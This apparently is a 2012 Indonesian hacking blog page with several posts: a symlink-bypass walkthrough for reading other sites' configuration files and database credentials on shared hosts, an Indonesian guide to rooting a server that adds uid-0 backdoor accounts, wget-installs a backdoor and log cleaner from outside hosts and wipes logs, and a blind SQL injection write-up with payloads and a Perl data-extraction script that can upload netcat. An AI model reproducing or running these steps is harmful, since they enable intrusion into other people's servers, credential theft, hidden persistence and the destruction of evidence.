Sabtu, 31 Maret 2012

How Hackers Hack Into Websites by Symlink Bypass

In our previous article How Hackers Are Hacking Into Websites by Symlink, we explained you step by step how hackers hack a website on a shared host with symlink bypass. However what if the Admin has changed the name of the configuration file or has moved it to another place. In such cases require directory access in order to locate the configuration file. Which will be topic of today's post. Getting directory access via symlink bypass.

What Is Symlink Bypass?

Well, I would not like to go into much detail. However for your understanding all you need to know is that symlink is a method to refrence other files and folders on linux. Just like a shortcut in windows. Symlink is necessary in order to make linux work faster. However symlink bypassing is a method which is used to access folders on a server which the user isn't permitted. For example the home directory can only be accessed by a root level user. However with symlink bypass you can touch files inside home directory.

Directory Access With Symlink Bypass

Step 1 

Perform the same steps which we did before. Create a directory, e.g abc. Now upload jaguar.izri & .htacess in it. Give 0755 permission to jaguar.izri





Steps 2

Suppose that we uploaded it in root of dir. So our path should be www.site.com/abc. Next open it and load the jaugar.izri, which will be located on www.site.com/abc/jaugar.izri



Step 3 

Open it and make a new dir named 123 by issuing the command mkdir 123.


Step 4 

Now lets enter dir 123 by giving command cd 123.


Step 5

Now give the following command ln –s / root



Step 6

Once you have issued the command ln -s /root, you should see folder named root in dir 123. In order to check go to www.site.com/abc/123/ and you will see a folder named root.



Step 7

Next go back to script and press upload file:

Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php


Copy the above in a notepad and rename it as .htacess and upload it to 123 folder.





Step 8

Next open root dir. www.site.com/abc/123/root

Note: if you don’t upload that .htacess you wont see this home folder


Step 9

Now click on that home folder and upload the domain.php file to get usernames. Or use the command cat /etc/passwd, to get the usernames.




Step 10

Now go to bing.com enter ip:xx.xx.xx.xx/joomla to get joomla sites on server search for names in users column of that sites once found. Place that name after home and add public_html like www.site.com/abc/123/root/home/victimusername/public_html


Step 11

When you do that you will get access to dir of that website.

Step 12

Now click on configuration.php it will show you blank page> Don’t worry just right click their and view page sources you’ll have database access.


Even if the admin has changed the admin login page or the configuration file, You can still find it by using this method.

Buat Sobat Bloger yang ingin tukar link Bisa Kunjungi Link ini

Selasa, 27 Maret 2012

cara root shell

cara root shell sih gampang nah berikut caranya :

    Pertama Masuk ke c99 kita siapin nc dlo di kompi nah hbs tuh kita backconnect kalo udh berhasil maka akan keluar shell di cmd windows atau linux kita [ kalau kita udh punya akses shell tanpa melalui web lansung aja ke tahap 2 ]
    setelah ituh kita cukup menanam local root exploit
    kemudian kita cukup melakukan perintah

    gcc rooter file-localroot

misalnya nama local root exploit kita kernel.2.6.35

    gcc rooter kernel.2.6.35

habis perintah itu kita cukup memasukan perintah

    ./rooter

klo udh klo ada respone kita ketik di cmd window kita tadi whoiam atau id
maka akan keluar

uid=0(root) gid=0(root) groups=50(ftp)


selanjutnya kita :

Add login akses root anda
----------------------------------------------------------------

1. Cara I

(bukan utk redhat 7.2)
/usr/sbin/useradd rampok -u 0 -d /

passwd -d rampok
passwd rampok

su rampok <<--------untuk super user

2. Cara II

kalo mau dapet acces root ketik :

/usr/sbin/useradd crit -u 0 g- 0 -d /etc/crit
abis itu ketik lagi
passwd crit

wuasu666

Kemudian Add User untuk login shell anda

/usr/sbin/adduser html -g wheel -s /bin/bash -d /etc/html
passwd html
fuck666 2X

---> Pasang backdor ke shell baru anda guna menjaga kemungkinan yg tidak di inginkan

wget www.utay-doyan.cc/shv4.tar.gz
tar -zxvf shv4.tar.gz
cd shv4
./setup pass yang dimau port yang dimau

contoh : --> ./setup wuasu 7000
cd /

wget http://cyberborneo.b0x.com/cleaner.tgz
tar -zxvf cleaner.tgz
cd cleaner
./install

Jangan lupa untuk menghapus file backdor anda tadi untuk menghapus jejak

rm -rf cleaner.tgz

rm -rf shv4.tar.gz

-*------*-

---> Hapus jejak ngeroot anda ketik perintah berikut:

rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /devory
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog
ctrl d


Happy Rooting

Buat Sobat Bloger yang ingin tukar link Bisa Kunjungi Link ini

Time Based Blind SQL Injection

Time Based Blind SQL Injection

I am not going to talk about Blind SQL injection since this is fully documented across different web sites, check References section at the end of this blog.

The reason I am writing this blog is for two main purposes:

1. Bug Hunting: To explain the process I followed to discover a "not-easy-to-find" vulnerability.

2. Exploit form scratch: To release a tool to extract data from the Data base via SQL Blind injection.


Bug Hunting:

When I put the famous single quote in front of the form I got the well known message:

Microsoft OLE DB Provider for SQL Server
error '80040e14'
Unclosed quotation mark before the character string '''.
Then, without any extra parsing to above error response, I started inserting the common ways of exploitation:
  • '+OR+'1'='1
  • '+OR+1=1--
  • '+having+1=1--
  • '+union (select 1 from table)--
  • etc

The first thing I noticed is that the spaces were being filtered but as explained in my previous SQLi post, you can easily bypass that by injecting a TAB (%09) instead of a space.

After bypassing the space restriction, I always got syntax errors like:


Incorrect syntax near the keyword 'OR'.

Incorrect syntax near the keyword 'having'.

Incorrect syntax near the keyword 'union'.

Which was telling me two things: first, my SQLi was being executed but with syntax errors and second that I was not in the common scenario where the injection is being placed after the WHERE clause:

select ..... where user='aa' OR 1=1

After a lot of testing without success, I just assumed I cannot inject any SQL command after the single quote, so, then I started inserting other chars like: ',' and... I got below error:

Procedure or function get_Etiqueta has too many arguments specified.

Then I realized we were dealing with a Stored Procedure which in fact was injectable, this could explain the restrictions and therefore the syntax error messages. Then I decide a new way of injection (below is the value inserted in the vulnerable POST parameter):

';;--
Above injection is saying, complete the current request, execute my own SQL command, and comment out the rest of the string.

When executed using fake table and field:

'; select xxx from table tabla'--

I did not get any error, just redirected back to main Login page. Then I realized we were not getting any responses from the DB and therefore in a Blind SQL Injection scenario, so I decided to use the famous WAITEFOR DELAY command from MSSQL to validate if my attempts were being executed in the server side, so I sent:

0';WAITFOR%09DELAY%09'0:0:15'
And voila!!! The browser waits 15 seconds to get the response from the Server!! Now we have identified the BUG, so, how can we exploit it? Let's go to the next section.

Exploit from Scratch.

I decided to use sqlmap or sqlninja to dump the database or to get a remote shell, but none works for me, just for one reason, those tools have their own methods to bypass filters, but unfortunately, the TAB (%09) trick is not handled by them and therefore all my injections were being rejected. It was a mess to adjust their tools so I decided to keep improving my own tools and come up with Regalado-blindSQL.pl perl script.

The main features of the tool are as follows:

  • Create a SQL procedure to assign the SQL query result to a variable.
  • The tool, iterates to each char from the result and compare it with the ASCII table to identify its value, if the value is found, the response will be delay by 10 seconds, this way the tool can identify if a char was identified.
  • Write output to a log file.
  • Implements netcat upload feature from Sqlninja tool, just changing the bypass technique and the Libraries used to established the SSL Connection.
Below the script to identify the chars in the response:

1. my $cmd = " declare \@s varchar(100) select TOP 1 \@s = $sql" .
2. " if (ascii(substring(\@s,$j,1))) =". $i ." waitfor delay '0:0:10' " .
3. " else waitfor delay '0:0:1'";

At Line 1, we create the variable @s and assign it the result of the $sql being executed.
At Line 2, the first char (denoted by $j) is subtracted from the string acquired and compare with the first value in the ASCII Table ($i).
This loops will repeat until the char is found and then $j will be incremented to move to the next char in the string.

The main loop to get the string, parse each char and compare it with ASCII TABLE is here:

while (length ($dato) > 0){ #Keep searching until no more data found
$dato ="";
for $j (1 .. 100){#This is the maximum text length to retrieve, although the tool knows when the string is complete
print "\t\nIdentificando char number: $j\n";
open (FILE,">>", "output.txt") or die $!; #Creating log file
for $i (32 .. 126){ #ASCII TABLE Printable chars only
$g = $i;
print "\t\nValidating if the letter exist: " . chr($i) . "\n";
my $cmd = " declare \@s varchar(100) select TOP 1 \@s = $sql" .
" if (ascii(substring(\@s,$j,1))) =". $i ." waitfor delay '0:0:10' " .
" else waitfor delay '0:0:1'";

send_request($prefix . $cmd . $postfix); #Send HTTPS request
if (check_time() eq "encontrado") { #validates the response to know if the car was detected.
last;
}
}

if ($r eq "encontrado"){
print "\t\nGetting Contenido ... " . $dato . "\n";
print FILE "Getting Contenido ...: " . $dato . "\n";
close(FILE);
}
else{ #No encontro ningun caracter y esto puede significr el fin de la palabra identificada

print "\t\n*********END OF CONTENT EXTRACTTION ... Moving to next one.\n";
last;
}
}
print "\t\n****************Content FOUND: " . $dato . " for table/field: $tb/$fi******************\n";
print FILE "\n****************Content FOUND: " . $dato . " for table/field: $tb/$fi****************\n";

$sql = $sql . " and $fi not like '". $dato . "'"; #preparing the next string to retrieve.
}
print "\t\nEND OF EXECUTION check output.txt log file.\n\n";

Finally, the tools is able to identify:

  • DB Name
  • DB User
  • DB Version
  • List of tables from current DB
  • List of fields from specific table
  • Content of tables
  • Upload netcat via sqlninja methods.
IMPORTANT: The tool DOES NOT FIND vulnerabilities, it assumes you already found one and need to leverage the exploitation. Being this said, you might need to change the $prefix and $postfix variables within the tool to adjust based on the way your application is exploitable.

References:
http://danuxx.blogspot.com/2012/03/time-based-blind-sql-injection.html

Buat Sobat Bloger yang ingin tukar link Bisa Kunjungi Link ini

Kamis, 22 Maret 2012

Just For Update

Iseng cuma mau ngupdate doank..
dari pada nggak terupdate.
kan sayang.
udh brp tahun ini blog..
tapi blm juga dapet page rank..

karena gw jarang banget update

Buat Sobat Bloger yang ingin tukar link Bisa Kunjungi Link ini